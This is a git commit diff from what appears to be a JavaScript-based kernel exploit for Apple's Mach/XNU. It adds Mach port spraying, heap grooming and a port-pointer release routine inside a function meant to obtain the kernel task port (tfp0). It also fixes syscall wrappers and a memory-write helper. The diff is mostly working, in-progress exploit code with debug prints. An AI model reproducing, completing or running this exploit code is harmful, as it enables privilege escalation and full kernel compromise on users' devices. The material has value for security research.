diff options
| author | spv <aquaticvegetable@gmail.com> | 2022-04-27 12:00:16 -0400 |
|---|---|---|
| committer | spv <aquaticvegetable@gmail.com> | 2022-04-27 12:00:16 -0400 |
| commit | 41a1e7292997c84643202f3d27a4daa4b02197e4 (patch) | |
| tree | 4d2828935d4b5e9100903a698ea6136d1b277649 /src | |
| parent | 33be9e9d0a5ee0abd0837b74cca15474b81c4f57 (diff) | |
add hopefully functional port spray and broken release_port_ptrs that hangs after 1 run
Diffstat (limited to 'src')
| -rwxr-xr-x | src/js/kexp/exploit.js | 60 | ||||
| -rwxr-xr-x | src/js/lib/myutils.js | 4 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 2 |
3 files changed, 53 insertions, 13 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index e0ef574..22f68ca 100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -26,8 +26,10 @@ var req_head_msgh_reply_port = 0xc; var req_head_msgh_id = 0x14; var req_msgh_body_msgh_descriptor_count = 0x18; var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2; -var req_init_port_set_address = 0x0 -var req_init_port_set_count = 0x4 +var req_init_port_set_address = 0x0; +var req_init_port_set_count = 0x4; +var MACH_RCV_MSG = 0x2; +var MACH_MSG_TIMEOUT_NONE = 0; var task_self = 0; var kslide = 0; @@ -181,7 +183,7 @@ function spray(dict, size, port) { var kp = 0; function spray_ports(number_port_descs) { - printf("spray_ports %d\n", number_port_descs); +// printf("spray_ports %d\n", number_port_descs); if (kp == 0) { kp = malloc(4); mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp); @@ -191,11 +193,12 @@ function spray_ports(number_port_descs) { var mp = malloc(4); mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp); - var rmp = read_u32(mp); - mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND); + mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND); - send_ports(rmp, read_u32(kp), 2, number_port_descs); - return mp; + send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs); + var ret = read_u32(mp); + free(mp); + return ret; } function fast_log2(n) { @@ -242,8 +245,10 @@ function send_ports(target, payload, num, number_port_descs) { new_buf_.push(tmp[3]); new_buf_.push(0); new_buf_.push(0); - new_buf_.push(19); new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR); + new_buf_.push(19); + +// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]); var new_buf = fast_array_mul(new_buf_, number_port_descs); @@ -267,11 +272,27 @@ function send_ports(target, payload, num, number_port_descs) { free(buf); - printf("%d %s\n", ret, mach_error_string(ret)); - return ret; } +function release_port_ptrs(port) { + printf("alive\n"); + var req = malloc(0x1c + (5 * 0xc) + 0x8); + for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) { + write_u32(req + i, 0x0); + } + printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0")); + printf("alive\n"); + var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); + printf("alive\n"); + // if (ret != KERN_SUCCESS) { + printf("mach_recv %d %s\n", ret, mach_error_string(ret)); + printf("alive\n"); + // } + free(req); + printf("alive\n"); +} + function get_kernel_task() { var ret = 0; var tfp0 = 0; @@ -318,17 +339,36 @@ function get_kernel_task() { prepare_ptr(big_buf, big_size, kptr, 256); prepare_ptr(small_buf, small_size, kptr, 32); + sched_yield(); for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) { var dummy = malloc(4); spray(big_buf, big_size, dummy); } + sched_yield(); for (var i = 0; i < PORTS_NUM; i++) { write_u32(fp + (i << 2), spray_ports(i)); var dummy = malloc(4); spray(small_buf, small_size, dummy); } + sched_yield(); + for (var i = 0; i < PORTS_NUM; i++) { + printf("test\n"); + printf("test1\n"); + printf("test2\n"); + printf("test3\n"); + printf("test4\n"); + printf("test5\n"); + printf("test6\n"); + printf("test7\n"); + printf("test8\n"); + printf("test9\n"); + printf("test10\n"); + release_port_ptrs(read_u32(fp + (i << 2))); + printf("test11\n"); + } + printf("get lucky\n"); return tfp0; diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js index 325c490..e856624 100755 --- a/src/js/lib/myutils.js +++ b/src/js/lib/myutils.js @@ -95,8 +95,8 @@ var strlen = scall_wrapper("strlen"); var mach_task_self = scall_wrapper("mach_task_self"); var mach_thread_self = scall_wrapper("mach_thread_self"); var malloc = scall_wrapper("malloc"); -var mach_port_allocate = scall_wrapper("malloc"); -var mach_port_insert_right = scall_wrapper("malloc"); +var mach_port_allocate = scall_wrapper("mach_port_allocate"); +var mach_port_insert_right = scall_wrapper("mach_port_insert_right"); var mach_port_set_attributes = scall_wrapper("mach_port_set_attributes"); var usleep = scall_wrapper("usleep"); var sched_yield = scall_wrapper("sched_yield"); diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js index ff12fdd..f6c4fe7 100644 --- a/src/js/primitives/mem.js +++ b/src/js/primitives/mem.js @@ -92,7 +92,7 @@ function write_u32_buf(addy, buf, len) { } function fast_write_buf(addy, buf) { - var upper_i = Math.floor(buf.length / 0x100); + var upper_i = Math.ceil(buf.length / 0x100); for (var i = 0; i < upper_i; i++) { u8x4 = u32_to_u8x4(addy + (i * 0x100)); |